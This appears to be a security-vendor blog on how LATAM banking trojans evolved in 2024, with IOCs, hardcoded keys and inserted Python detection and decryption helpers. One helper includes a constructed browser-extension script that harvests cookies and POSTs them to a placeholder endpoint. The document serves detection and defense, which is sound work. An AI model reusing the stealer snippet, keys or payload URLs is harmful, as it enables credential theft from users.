A Look Back: The Evolution of Latin American eCrime Malware in 2024

The evolution of LATAM-based malware in 2024 highlights the adaptability and ingenuity of its developers, who continue to refine their tools to sustain successful eCrime campaigns.

The Latin American (LATAM) cybercrime landscape continues to evolve as adversaries refine their tactics, techniques and procedures (TTPs) to bypass defenses and expand their reach.

Last year, we wrote a blog detailing our LATAM cybercrime observations throughout 2023. In this blog, we examine the significant updates observed in 2024 across prominent LATAM malware families, including Mispadu, Kiron, Caiman, Culebra, Salve and Astaroth.

Key Insights

  • Adopting Modern Techniques: LATAM-based malware developers are leveraging modern programming languages like Rust to improve evasion capabilities and hinder analysis.
  • Consistent Strategies: Multi-stage infection chains, malspam campaigns and phishing websites remain core components of their operations, primarily targeting Spanish- and Portuguese-speaking customers of LATAM financial institutions (FIs).
  • Collaborative Efforts: Evidence of overlapping techniques and tools highlights a shared knowledge base within the LATAM cybercrime ecosystem.

In 2024, LATAM-based threat actors demonstrated a clear focus on countering traditional detection methods. For instance, their adoption of Rust for downloader components highlights efforts to adapt to modern cybersecurity defenses.

At the same time, many TTPs remain consistent, with multi-stage infection chains, phishing campaigns and malspam used to target FIs across the region. These enduring TTPs, combined with innovative tools, show the adaptive nature of these cybercriminals.

Among the notable updates, Kiron emerged as the most actively developed malware family of 2024. Developers introduced new delivery mechanisms, including a browser-stealing extension, and briefly experimented with Rust-based downloaders. Additionally, Kiron campaigns mirrored the TTPs of SAMBA SPIDER (the operator of Mispadu), underscoring collaboration and shared expertise among LATAM threat actors.

Figure 1. Updates Timeline

This blog delves deeper into the technical advancements observed across these malware families throughout 2024.

Deep Dive: Evolving LATAM Malware Families

The malware families analyzed in this blog — Mispadu, Kiron, Caiman, Culebra, Salve and Astaroth — demonstrate the adaptability of LATAM-based cybercriminals. Each family reflects unique innovations, from the adoption of new programming languages like Rust to new obfuscation techniques and updated delivery mechanisms. Below, we explore how each of these malware families has evolved in 2024 and highlight their specific TTPs.

Mispadu: Infection Chain Updates

Community Identifiers: Mispadu, URSA
Operator: SAMBA SPIDER
Country of Origin: Brazil
Type: Banking Trojan and Information Stealer

April 2024: HTA Dropper Variant

SAMBA SPIDER launched a phishing campaign impersonating Mexico's electronic invoice system, Comprobante Fiscal Digital por Internet (CFDI). Malspam emails redirected users to download an HTA dropper (a variant of the 2023 version) containing obfuscated VBScript (VBS) to retrieve and execute the first-stage Mispadu downloader (tracked as D1). The campaign distributed Mispadu version 96.

June 2024: JavaScript (JS)-Based Downloader

In early June 2024, the malware developers introduced a new JS component, which is retrieved by the HTA component (Figure 2). Distributed using the filename prefix ❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_, the updated infection chain delivered Mispadu version 97, evolving into version 100 by late 2024.

Figure 2. HTA File Contents Observed During June 2024 Activity

Kiron: Rust Adoption and Browser Extensions

Community Identifiers: Grandoreiro
Type: Banking Trojan and Information Stealer

July 2024: NestoLoader Integration

Kiron was distributed via NestoLoader, which is a loader written in JPHP — a PHP implementation that runs in the Java virtual machine (VM). JPHP is not commonly used to develop eCrime malware because of the language’s recent introduction and limited feature set, and it was likely used to hinder analysis efforts and evade detection.

NestoLoader samples used to deliver Kiron were configured to communicate with the command-and-control (C2) server massgrave[.]site. Public telemetry reveals that NestoLoader deployed Kiron’s widely used Delphi downloader, which retrieved its payload from http[:]//108.165.96[.]26:8080/19b[.]zip. This Delphi downloader has been a staple for Kiron operators since 2019, with variants employed across multiple campaigns.

August 2024: Rust-Based Downloader

In early August 2024, Kiron operators transitioned from Delphi-based downloaders to a Rust-based alternative, which was distributed via NestoLoader samples configured to communicate with the C2 domain massgrave[.]site. In this updated delivery chain, the NestoLoader C2 provided a JSON response containing a Base64-encoded legitimate executable and a dynamic-link library (DLL).

To execute the Rust-based downloader DLL, NestoLoader relies on DLL search-order hijacking: the legitimate executable is launched and loads the malicious DLL from its own directory in place of the library it expects. This Rust-based downloader was used exclusively to deliver Kiron.

The downloader retrieved the next-stage component from http[:]//192.101.68[.]150/bb08[.]zip, an AES-encrypted ZIP file. Decryption used AES in CBC mode with a hardcoded 32-byte (AES-256) key (00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f) and a hardcoded initialization vector (1a 2b 3c 4d 5e 6f 00 11 22 33 44 55 66 77 88 99); both were consistent across all analyzed samples.

This ZIP file contained a Kiron core component configured with the prefix pkc, highly likely identifying a specific malware operator targeting customers of Brazilian and Mexican FIs. Kiron’s developers leveraged a custom domain generation algorithm (DGA) that combined the prefix with the current date to calculate its C2 server domain.

Malware Operators

Analysis of Kiron samples from this activity reveals two distinct string prefixes: z and pkc. The z prefix has been associated with Kiron operators since early 2024, while samples using the pkc prefix were observed between August and October 2024.

Kiron builds with the pkc prefix exclusively target customers of FIs in Brazil and Mexico, whereas builds with the z prefix have a broader geographic focus, targeting FIs in Chile, Peru, Ecuador, Argentina, Brazil, Costa Rica, Mexico, the U.K., Germany, Portugal and Spain. The specific targets are explicitly defined in Kiron’s hardcoded strings.

Overlap with SAMBA SPIDER

In late September 2024, Kiron operators began distributing the malware using a four-stage infection chain that closely mirrored SAMBA SPIDER’s June 2024 TTPs. This overlap suggests either that the same actor was responsible for both activities or that Kiron operators leveraged SAMBA SPIDER’s tooling to replicate Mispadu’s infection chain. This assessment is made with moderate confidence, based on similarities in first-stage components and filename patterns.

Kiron operators used HTA file naming conventions such as ❉VER CUENTA❉_, ❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_, and ❉processo❉_, which align closely with SAMBA SPIDER’s Mispadu naming scheme of ❉<STRING_IN_SPANISH>❉_<RANDOM_CHARACTERS>.hta. These shared patterns further underline the connection between the two sets of activities.
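The naming convention above is easy to hunt for once the decorative characters are handled correctly. The following Python check is an added example, not code from the original post or from CrowdStrike: it normalizes a filename with NFKC so that styled Unicode letters such as the double-struck 𝔽𝕒𝕔𝕥𝕦𝕣𝕒 collapse to plain Factura before matching, and it reports whether such styling was used (a useful signal on its own, since styled letters defeat naive ASCII keyword rules). The sample filenames are constructed from the prefixes quoted in the text with made-up random suffixes; the assumption that the random suffix contains no period is mine.

```python
import re
import unicodedata

# Decorative marker used at both ends of the lure string (U+2749, "❉").
STAR = "❉"

# ❉<lure>❉_<random>.hta, matched after NFKC normalization. The lure may be
# Spanish or Portuguese; the random suffix is assumed to contain no period.
LURE_HTA = re.compile(
    rf"^{STAR}(?P<lure>[^{STAR}]+){STAR}_(?P<rand>[^.]*)\.hta$", re.IGNORECASE
)


def match_lure_filename(name):
    """Return the lure string, the random suffix and whether styled Unicode
    letters were used, or None when the name does not follow the scheme."""
    normalized = unicodedata.normalize("NFKC", name)
    m = LURE_HTA.match(normalized)
    if m is None:
        return None
    return {
        "lure": m.group("lure"),
        "random": m.group("rand"),
        # True when NFKC changed something, e.g. 𝔽𝕒𝕔𝕥𝕦𝕣𝕒 -> Factura.
        "styled_unicode": normalized != name,
    }


def scan_filenames(names):
    """Apply the check to a list of names (mail-gateway attachment names,
    EDR file-create events) and return the hits with the original name."""
    hits = []
    for n in names:
        r = match_lure_filename(n)
        if r is not None:
            hits.append(dict(r, filename=n))
    return hits


# Constructed sample filenames built from the prefixes quoted in the text;
# the random suffixes and the non-matching names are made up.
SAMPLE_FILENAMES = [
    "❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_x7Kq29.hta",
    "❉VER CUENTA❉_Ab12cd.hta",
    "❉processo❉_9zQ1.hta",
    "Factura_2024.pdf",
    "❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_notes.txt",
]

if __name__ == "__main__":
    for hit in scan_filenames(SAMPLE_FILENAMES):
        print(hit)
```

Because normalization runs first, the same rule also catches future styled spellings of the lure word without a new regex; pair it with a rule on the HTA extension itself, since a legitimate business document is rarely delivered as an HTML Application.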

October 2024: Stealer Enhancement 

In mid-October 2024, a Kiron core component update introduced new stealer features aimed at gathering user data. This update included:

  • A browser-history grabber, derived from NirSoft’s web browser history tool, to collect users’ navigation data.
  • A Chromium-based browser-stealer extension designed to exfiltrate user cookies and email addresses.

Both components were embedded in the Portable Executable (PE) .rsrc section as encrypted ZIP files. To decrypt these archives, the malware utilized Kiron’s custom algorithm with the XOR key 0x8EF6 — a method consistent with the algorithm used by Kiron’s Delphi downloader for decrypting final-stage ZIP files.

Updated Obfuscation Techniques

Kiron core component samples from October 2024 introduced a new Base64-based obfuscation layer for string encryption while retaining the previously established XOR-based algorithm. This hybrid approach underscores the developers' ongoing efforts to complicate detection and analysis.

Browser-Stealer Extension Features

The browser-stealer extension comprises two JS files with distinct functionalities:

  • content.js: Scans the body of the currently visited webpage for email addresses and forwards any it finds to background.js.
  • background.js:
    • Sends the email addresses collected by content.js to Kiron’s core component.
    • Monitors browser tab updates for webmail sites, captures the associated cookies and exfiltrates them to the C2 server.
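An extension with the two behaviours just described needs a recognizable combination of manifest permissions and extension APIs, which is what a defender can triage for. The Python below is an added example, not code from the original post or from CrowdStrike, and it does not reproduce the Kiron extension: it scores a Chromium extension manifest plus its scripts for the cookies and tabs permissions, broad host access, a content script injected everywhere, and source-level use of chrome.cookies, chrome.tabs.onUpdated, an email-shaped regex literal and a network send. The sample manifest and script fragments are constructed to resemble the described capabilities; the field names are the standard Manifest V2/V3 ones, and the API heuristics are mine.

```python
import json
import re

# Host patterns that grant access to every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source-level heuristics for the behaviours described for background.js
# and content.js. Plain regexes over the script text, so obfuscated
# (e.g. string-concatenated) API names will slip past them.
API_SIGNS = {
    "cookie_access": re.compile(r"chrome\.cookies\.(getAll|get)\b"),
    "tab_monitoring": re.compile(r"chrome\.tabs\.onUpdated"),
    "email_scrape": re.compile(r"/[^/\n]*@[^/\n]*/[gimsuy]*"),  # regex literal with '@'
    "network_send": re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b"),
}


def triage_extension(manifest_json, scripts):
    """Return a verdict and the individual findings for one extension.
    scripts maps file name -> source text (content and background scripts)."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    # MV3 lists hosts in host_permissions; MV2 mixes them into permissions.
    hosts = set(m.get("host_permissions", [])) | (perms & BROAD_HOSTS)
    cs_hosts = set()
    for cs in m.get("content_scripts", []):
        cs_hosts |= set(cs.get("matches", []))

    findings = []
    if "cookies" in perms:
        findings.append("manifest: cookies permission (can read session cookies)")
    if "tabs" in perms:
        findings.append("manifest: tabs permission (can watch every tab's URL)")
    if hosts & BROAD_HOSTS:
        findings.append("manifest: broad host access (cookies/requests for all sites)")
    if cs_hosts & BROAD_HOSTS:
        findings.append("manifest: content script injected into all pages")
    for name, src in scripts.items():
        for label, rx in API_SIGNS.items():
            if rx.search(src):
                findings.append(f"{name}: {label}")

    labels = {f.split(": ", 1)[1] for f in findings}
    # Verdict: can see tabs and cookies everywhere, reads cookies, and sends them out.
    stealer_like = (
        {"cookies", "tabs"} <= perms
        and bool(hosts & BROAD_HOSTS)
        and "cookie_access" in labels
        and "network_send" in labels
    )
    return {"stealer_like": stealer_like, "findings": findings}


# Constructed sample, modelled on the capabilities the text attributes to the
# Kiron extension. Not the actual extension's manifest or code.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Update Helper",
    "version": "1.0",
    "permissions": ["cookies", "tabs", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
})
SAMPLE_SCRIPTS = {
    "content.js": "const found = document.body.innerText.match(/[\\w.+-]+@[\\w-]+\\.[a-z]{2,}/gi) || []; "
                  "chrome.runtime.sendMessage({emails: found});",
    "background.js": "chrome.tabs.onUpdated.addListener((tabId, info, tab) => { if (!info.url) return; "
                     "chrome.cookies.getAll({url: info.url}, cs => fetch(ENDPOINT, "
                     "{method: 'POST', body: JSON.stringify(cs)})); });",
}
# A benign manifest for comparison (constructed).
BENIGN_MANIFEST = json.dumps({"manifest_version": 3, "name": "Notes", "version": "1.0",
                              "permissions": ["storage"]})

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), indent=2))
    print(json.dumps(triage_extension(BENIGN_MANIFEST, {}), indent=2))
```

The manifest findings alone are not proof of malice (password managers legitimately hold cookies and broad host access), so the verdict requires the API usage as well; in an enterprise, the more reliable control is an extension allowlist enforced through browser policy, with this triage reserved for extensions that appear outside it.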

Caiman: Advanced String Obfuscation

Community Identifiers: Grandoreiro
Type: Banking Trojan and Information Stealer

In September 2023, Caiman developers implemented a custom string obfuscation process designed to enhance the malware’s defense evasion capabilities. This new method marked a departure from the widely recognized XOR-based algorithm commonly used by other LATAM malware families.

String Obfuscation

In June 2024, Caiman developers introduced a sophisticated string decryption process (Figure 3) that combines Base64 encoding, a pseudo-random number generator (PRNG) and a custom XOR-based algorithm for enhanced obfuscation.

Figure 3. String Decryption Process

Seed Generation

Caiman begins by Base64-decoding an encrypted string and extracting its first two and last two characters. These four characters are concatenated, and their integer representations are summed twice to produce the seed value that initializes the PRNG.

XOR Key Creation

The malware uses a hardcoded dictionary of characters: !@#$%^&*()_+-=[]{}|;:,.<>?. This dictionary is processed in reverse through the PRNG initialized with the seed value, producing the final XOR key required for string decryption.

Decryption

Using the calculated XOR key, Caiman extracts a single character (a shift) from the encrypted string. A custom XOR operation applies this shift to decrypt the string, producing a Base64-encoded result. This result is then decoded to reveal the plaintext string (Table 1).

Table 1. Exemplar Caiman-Decrypted String

  • Encrypted string: OjhEMjdCQUIyNDZFQzAxNjRCQTBGODI5N0ZDRTI1OTBGQzNGQzlBMTkyQTdDRDE0NTA5NkRCN0I4NGxI
  • Base64-encoded string after XOR decryption: Q0xJRU5UX0VOVklBX1NUQVRVU3w
  • Plaintext string: CLIENT_ENVIA_STATUS|

Culebra: Downloader Updates

Community Identifiers: Mekotio
Type: Banking Trojan

In late July 2024, Culebra developers introduced updates to the malware’s downloader component, a two-stage component written in batch and PowerShell (PS). Though the updated downloader incorporates techniques from the Delphi-based version observed in 2023 and early 2024, it also includes several notable refinements.

Batch Loader

The first stage is an obfuscated batch script containing strings of integers and a custom alphabet that varies between samples. This alphabet is employed in a permutation cipher to decrypt and execute the PS downloader.

PS Downloader

The second stage uses string obfuscation based on the widely recognized XOR algorithm, a common feature of LATAM-based banking trojans. It ensures that only one instance of the malware runs by creating a marker directory in %LOCALAPPDATA% named with a date-based pattern (DDYYMM), and it creates a second, randomly named nine-character folder within %LOCALAPPDATA% to store the core component.

The PS downloader performs extensive system reconnaissance, collecting:

  • Geolocation
  • Hostname
  • Username
  • Windows version
  • Antivirus information
  • Public IP address

This information is sent to the C2 server over a TCP connection, awaiting a response with the command INFO_RECEIVED to confirm its validity. Once validated, the downloader issues the command SEND_FILE to retrieve a ZIP archive containing the Culebra core component. The C2 server responds with the command string FILE_SENDING, appending the ZIP archive to the response.

Protocol Enhancements

Following the new downloader introduction, the malware developers introduced additional updates:

  • September 2024: The communication protocol was updated to introduce the command string ZIP_FILE, which specifies a filename. The downloader now uses this filename to fetch the ZIP archive via an HTTP GET request to the URL pattern: http://<C2_SERVER>/arquivados3/<FILENAME>.
  • October 2024: Developers further refined the protocol, replacing the SEND_FILE and INFO_RECEIVED commands with EIAD_VEAD and CAEIDAH_DOMU, respectively.
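The two on-disk artefacts and the three protocol revisions above are enough to write a host-side check and a C2-message classifier. The Python below is an added example, not code from the original post or from CrowdStrike, and it is not the downloader itself: it recognizes the DDYYMM marker directory (validating the field order, so a plausible MMDDYY name with an impossible DDYYMM reading is rejected), the nine-character store folder, and classifies server responses in both the July and October 2024 command spellings, including the September ZIP_FILE variant that yields an HTTP URL. The sample responses and directory names are constructed; the alphanumeric charset for the random folder, the whitespace delimiter after ZIP_FILE and the C2 hostname are assumptions.

```python
import re
from datetime import date

DATE_MARKER = re.compile(r"^(?P<dd>\d{2})(?P<yy>\d{2})(?P<mm>\d{2})$")
RANDOM_STORE = re.compile(r"^[A-Za-z0-9]{9}$")  # nine characters; alphanumeric charset assumed


def is_date_marker_dir(name):
    """DDYYMM marker directory, e.g. 312407 for 31 July 2024."""
    m = DATE_MARKER.match(name)
    if not m:
        return False
    try:
        date(2000 + int(m["yy"]), int(m["mm"]), int(m["dd"]))
    except ValueError:  # e.g. 150325 read as DDYYMM has month 25
        return False
    return True


def is_random_store_dir(name):
    return RANDOM_STORE.match(name) is not None


def classify_localappdata(names):
    """Split directory names found under %LOCALAPPDATA% into the two artefact types."""
    return {
        "date_markers": [n for n in names if is_date_marker_dir(n)],
        "random_stores": [n for n in names if is_random_store_dir(n)],
    }


# Command strings: July 2024 spelling first, October 2024 replacement second.
INFO_ACK = (b"INFO_RECEIVED", b"CAEIDAH_DOMU")
FILE_REQUEST = (b"SEND_FILE", b"EIAD_VEAD")
FILE_INLINE = b"FILE_SENDING"   # ZIP archive appended to the response
FILE_BY_NAME = b"ZIP_FILE"      # September 2024: filename follows, fetched over HTTP
ZIP_MAGIC = b"PK\x03\x04"


def zip_url(c2_host, filename):
    """URL pattern used after the September 2024 protocol change."""
    return f"http://{c2_host}/arquivados3/{filename}"


def is_file_request(msg):
    """Client-side request for the core component, in either command spelling."""
    return msg.strip() in FILE_REQUEST


def parse_c2_response(resp, c2_host):
    """Classify one server-to-client message from a captured TCP stream."""
    for cmd in INFO_ACK:
        if resp.startswith(cmd):
            return {"kind": "info_ack", "command": cmd.decode()}
    if resp.startswith(FILE_INLINE):
        payload = resp[len(FILE_INLINE):]
        return {"kind": "inline_zip", "is_zip": payload.startswith(ZIP_MAGIC), "size": len(payload)}
    if resp.startswith(FILE_BY_NAME):
        # Delimiter between the command and the filename is assumed to be whitespace.
        fname = resp[len(FILE_BY_NAME):].strip().decode("ascii", "replace")
        return {"kind": "fetch_zip", "url": zip_url(c2_host, fname)}
    return {"kind": "unknown", "head": resp[:16]}


# Constructed samples; not captured traffic or real directory listings.
SAMPLE_RESPONSES = [
    b"INFO_RECEIVED",
    b"FILE_SENDING" + ZIP_MAGIC + b"\x00" * 10,
    b"ZIP_FILE 7a1b.zip",
    b"CAEIDAH_DOMU",
]
SAMPLE_DIRS = ["312407", "150325", "Packages", "aB3xZ9qLm", "Temp"]

if __name__ == "__main__":
    print(classify_localappdata(SAMPLE_DIRS))
    for r in SAMPLE_RESPONSES:
        print(parse_c2_response(r, "c2.example"))
```

Treat the nine-character folder as weak evidence on its own (Microsoft is nine letters) and corroborate it with creation time, a child process launched by powershell.exe, or a DDYYMM sibling created the same day; the date marker is the stronger of the two because a legitimate application has no reason to create a directory named after the current day in that field order.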

Salve: A Likely Hiatus to Experiment with Rust

Community Identifiers: Casbaneiro
Type: Banking Trojan

In mid-March 2024, Salve developers updated their infection chain to include a Rust-based downloader, marking a notable shift in their TTPs. This activity followed a likely hiatus that began in November 2023, potentially signaling a period of adaptation and experimentation.

Rust-Based Downloader Details

The newly introduced downloader lacked advanced anti-analysis features, suggesting it was primarily designed for functionality rather than stealth. The analyzed downloader was configured to:

  • Download URL: https[:]//public.adobecc[.]com/files/1CBZREKGR3QFQLNIAB3CPYSQNZAFFF?content_disposition=attachment;filename=%22Upload_20240311-130634.zip
  • Beacon URL: http[:]//38.54.57[.]26/lu/conta.php

While the download URL hosts the final payload, the beacon likely serves to track infection metrics by counting the total number of successful infections.

VMProtect-Packed Salve Build

On March 22, 2024, the downloader was observed delivering a VMProtect-packed Salve build, configured to use the dead-drop resolver URL: https[:]//api.cacher[.]io/raw/e9972f773263412223fe/d5186951e0cbbf25c69b/a.

The resolver contained encrypted content (Figure 4), which decrypted to reveal the C2 server address (Figure 5) using the widely recognized LATAM XOR algorithm and Salve's well-known decryption key: 584HG4841U987IO9876LS21345K985126FGD4554Y21A87F9.
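The "widely recognized LATAM XOR algorithm" referenced here for Salve, and above for the Culebra PS downloader's string obfuscation, is a chained byte cipher rather than a plain XOR. The Python below is an added example, not code from the original post or from CrowdStrike, implementing the form of that routine published in earlier public analyses of these families: the first byte is a seed, each following ciphertext byte is XORed with the next key byte, and the previous ciphertext byte is subtracted with a 0xFF wrap. An encoder is included so the sample dead-drop content can be constructed in the block and round-tripped offline; the C2 string it hides is a documentation address, not an indicator. Treat the exact variant as an assumption and confirm it against the sample's decryption function (in particular whether the key index starts at the first key byte and whether the wrap adds 0xFF or 0x100).

```python
# Well-known Salve decryption key quoted in the text.
SALVE_KEY = "584HG4841U987IO9876LS21345K985126FGD4554Y21A87F9"


def latam_xor_decrypt(hex_blob, key):
    """Decrypt a hex-encoded string with the commonly published LATAM routine.
    data[0] is a seed byte, not plaintext; key bytes cycle from the first one."""
    data = bytes.fromhex(hex_blob)
    key_b = key.encode("latin-1")
    out = bytearray()
    prev = data[0]
    for i in range(1, len(data)):
        k = key_b[(i - 1) % len(key_b)]
        x = data[i] ^ k
        if x <= prev:      # undo the modular wrap applied at encryption time
            x += 0xFF
        out.append(x - prev)
        prev = data[i]     # chaining uses the ciphertext byte, not the plaintext
    return out.decode("latin-1")


def latam_xor_encrypt(plain, key, seed=0x9A):
    """Inverse of latam_xor_decrypt, used here only to build test data.
    NUL bytes are not representable (x == prev collides with the wrap), which
    is fine for the strings these families store."""
    key_b = key.encode("latin-1")
    out = bytearray([seed])
    prev = seed
    for i, p in enumerate(plain.encode("latin-1")):
        x = p + prev
        if x > 0xFF:
            x -= 0xFF
        c = x ^ key_b[i % len(key_b)]
        out.append(c)
        prev = c
    return out.hex().upper()


def decrypt_dead_drop(content, key):
    """Dead-drop pages carry the hex blob, possibly wrapped in whitespace or newlines."""
    return latam_xor_decrypt("".join(content.split()), key)


# Constructed sample: a documentation-range address encrypted with the Salve key.
SAMPLE_C2 = "http://192.0.2.10/cnt/index.php"
SAMPLE_DEAD_DROP = latam_xor_encrypt(SAMPLE_C2, SALVE_KEY)

if __name__ == "__main__":
    print(SAMPLE_DEAD_DROP)
    print(decrypt_dead_drop(SAMPLE_DEAD_DROP + "\n", SALVE_KEY))
```

A quick sanity check on a real sample is that the plaintext of a dead-drop blob should be a URL or host:port string and that decrypting with the wrong key produces high-byte garbage rather than ASCII; if the output is almost readable but shifted by one, the wrap constant or the key offset is the likely difference.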

Figure 4. Salve-Encrypted Dead-Drop Content
Figure 5. Salve-Decrypted C2 Server Address

Astaroth: Minor Refinements

Community Identifiers: Astaroth, Guildma
Type: Banking Trojan and Information Stealer

Updates in April 2024 focused on minor refinements, including:

  • New string obfuscation for Windows Shortcut (LNK) downloaders: strings are now encoded as their byte (numeric) representation.
  • Added new fields to refactor the installer’s C2 protocol
  • Updated the configuration file by renaming existing fields

In November 2024, Astaroth developers included a XOR key derivation process to decrypt strings in the core component. As of this writing, Astaroth operators are distributing version 376 of the malware.

Conclusion

The evolution of LATAM-based malware in 2024 highlights the adaptability and ingenuity of its developers, who continue to refine their tools to sustain successful eCrime campaigns. By combining modern advancements with proven TTPs, these updates provide cybersecurity researchers with valuable opportunities to continue detecting and tracking these threats.

One significant area of innovation is obfuscation techniques, with malware families like Caiman adopting entirely new algorithms and others — such as Kiron, Culebra and Astaroth — layering additional methods onto the widely used XOR-based approach. This evolution underscores the developers' focus on staying ahead of detection efforts.

The experimentation with Rust downloader components is another notable development, reflecting a willingness to explore modern programming languages for evasion. There is an even chance that developers will continue to use Rust in future campaigns. This assessment is made with low confidence based on the limited use of Rust components and their subsequent abandonment, which suggests uncertainty about its practicality for long-term adoption.

Despite these innovations, Delphi-based components are highly likely to remain a staple of LATAM malware in the near term. This assessment is made with moderate confidence since their reliability and years of use make them a trusted choice for malware operators.

By closely monitoring these developments and leveraging insights into both new and enduring TTPs, the cybersecurity community can remain proactive in mitigating the evolving threats posed by LATAM-based eCrime malware.

Recommendations

To mitigate the risks posed by the activity described in this report, consider implementing the following best practices:

  1. Enhance User Awareness:
     • Train employees to recognize social engineering techniques and identify phishing emails.
     • Emphasize the importance of avoiding the execution of files from untrusted sources.
  2. Validate Software Sources:
     • Always verify website certificates on download pages to confirm that software originates from a legitimate and trusted source.
  3. Strengthen Browser Protections:
     • Enable download protection settings in browsers to issue warnings for potentially harmful websites or files.
  4. Restrict Script-Based Executions:
     • Disable Windows Script Host (WSH) via the Windows Registry on systems where the tool is not required.
     • Implement script-enforcement policies using App Control for Business to block the execution of scripts such as PS, VBS and MSHTA.

Learn More

For additional information on CrowdStrike’s in-depth research and real-time access to indicators of compromise (IOCs) like the ones featured in this blog, visit the CrowdStrike Counter Adversary Operations website. CrowdStrike Falcon® Adversary Intelligence provides comprehensive insights, actionable threat data and continuous updates to help you stay ahead of evolving cyber threats.

Equip your team with the intelligence needed to effectively detect, track and mitigate sophisticated malware campaigns. Explore how CrowdStrike can enhance your organization’s defenses today.

Indicators of Compromise

The following table provides a detailed list of IOCs associated with the malware families and campaigns discussed in this blog. These IOCs include hashes, URLs, domains and other artifacts that can be used to identify and mitigate potential threats within your environment.

By incorporating these IOCs into your security tools and monitoring processes, you can enhance your organization’s ability to detect and respond to malicious activity linked to these LATAM-focused eCrime campaigns.

Table 2. IOCs

Mispadu
  • SHA256 hash of HTA dropper from April 2024: b23aabe16db5f6ccdd061b457d01b94647ed5b5852806624dca277b43d63e188
  • D1 downloader URL for HTA from April 2024: https[:]//162.200.178[.]68.host.secureserver[.]net/g1
  • D2 download domain for HTA from April 2024: 162.200.178[.]68.host.secureserver[.]net
  • SHA256 hash of HTA dropper from July 2024: 5f6c0ba669db489bc2ff186af312bfe7616f9e4a12706e195225da7168e10db0
  • Download URL for HTA file from July 2024: https[:]//contpt[.]top/ROmRv22/AGSfA782.js
  • SHA256 hash of JS downloader for HTA file from July 2024: fc258ef827620184253ba37d94efc0043745c29cf3c9f21a6c730f7727d6d076
  • Second-stage JS download URL for HTA file from July 2024: https[:]//contpt[.]top/gZS74/N5LbsD5852.vbs
  • SHA256 hash of D1 downloader for HTA file from July 2024: ba4e715fe25aeaaf186e8395c2f13ca580457ab4e8ec1c037fd13821d97a6848
  • D1 downloader URL for HTA file from July 2024: https[:]//contpt[.]top/g2
  • D2 download domain for HTA file from July 2024: contpt[.]top
  • Mispadu version 100 SHA256 hash: 15899e250892c2cc6b38d7cdcd2a3934a49c5dca954889564a98d15a52bf3b7c

Kiron
  • SHA256 hash of MSI file containing NestoLoader: 46b8e68f5e85935349d0bfc555b9786f7adbac9ec9a9fa174ba0c4f89baa098f
  • NestoLoader C2 servers: massgrave[.]site, 147.45.116[.]5
  • Rust downloader SHA256 hash: 148cd318aec19451b9ad17e58e0d97ebaffd46b56d3528608de20b95dd429c45
  • SHA256 hash of encrypted ZIP file containing payload: 0f035dced631ac58cfae510cfc61bb1dbef119331a8aea8d5c724a5ddca0f8c5
  • Delphi downloader URL: http[:]//108.165.96[.]26:8080/19b[.]zip
  • HTA file SHA256 hash: bbf766df1972966b0ab3928d82c61d953e849638bb2c0bab60df3ad8aaacf174
  • HTA file download URL: https[:]//adjunto.pdfxml[.]store//6725c86d7fae4/js/6725c86d7fa55.js
  • Fourth-stage VBS downloader SHA256 hash: 3972d6c85bb37889265fef3bb3b3ed8494e038ca37e345a515e39b3e95766a50
  • SHA256 hash of core component with new stealer features: 129971e378991d14c444db7a7f4c9a16ece750dd6498261d2f35c85baa9bfd07

Caiman
  • Downloader SHA256 hash: 27f482377777a1b8e1e679863685f64121f28e1e6e2bba832397269d1763e118
  • Dead-drop resolver: lovecollege.hosthampster[.]com

Culebra
  • First-stage batch script downloader SHA256 hash: d7a918b29b4423b2a4be151f1b37c28abc081068c13a04ad8fd70dbd725d659b
  • Second-stage PS script downloader SHA256 hash: 07a58395e20090f139eb0cb3aa1872da4fae8c1630de818a405d3329a7406150
  • C2 server for second-stage PS script: 84.246.85[.]94:7890
  • Final-stage ZIP file SHA256 hash: 60b32e40ec0a5e59081fa9816a26346892899175ce97c811761423c3533e0651

Salve
  • Rust downloader SHA256 hash: 5d74d439bbb0be789e23bdaafd8cff938e6e686af7c8e215dc945cacc88d131c
  • Download URL: https[:]//public.adobecc[.]com/files/1CBZREKGR3QFQLNIAB3CPYSQNZAFFF?content_disposition=attachment;filename=%22Upload_20240311-130634.zip
  • Beacon URL: http[:]//38.54.57[.]26/lu/conta.php
  • Second-stage ZIP file SHA256 hash: 2776c052d11f52501871c4cb5a051a1970f002c3f099969040945fb94a158d9a
  • Dead-drop URL: https[:]//api.cacher[.]io/raw/e9972f773263412223fe/d5186951e0cbbf25c69b/a
  • C2 IP address: 191.55.53[.]136

Astaroth
  • LNK downloader SHA256 hash: 57e76a7af5bafb4ff06f5f44dcf1182ea5c6a8682651c260f555c52fd441b412
  • Installer component SHA256 hash: aec68d256d8d2caf2d94c5944279806dd4da36d125c7a7d1485c89f718d0db15

CrowdStrike Intelligence Confidence Assessment

High Confidence: Judgments are based on high-quality information from multiple sources.  High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or too poorly corroborated to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.
